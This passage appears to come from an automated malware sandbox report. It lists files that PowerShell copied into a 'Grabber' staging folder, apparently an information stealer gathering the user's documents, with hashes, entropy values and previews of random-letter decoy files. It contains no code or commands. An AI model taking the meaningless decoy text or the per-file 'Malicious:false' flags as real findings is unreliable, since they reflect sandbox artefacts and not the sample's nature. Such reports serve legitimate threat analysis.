QQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):402
                                                                                      Entropy (8bit):3.493087299556618
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                                      MD5:ECF88F261853FE08D58E2E903220DA14
                                                                                      SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                                      SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                                      SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\DUUDTUBZFW.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\DUUDTUBZFW.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\EIVQSAOTAQ.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.692024230831571
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                      MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                      SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                      SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                      SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\EWZCVGNOWT.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690071120548773
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                      MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                      SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                      SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                      SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

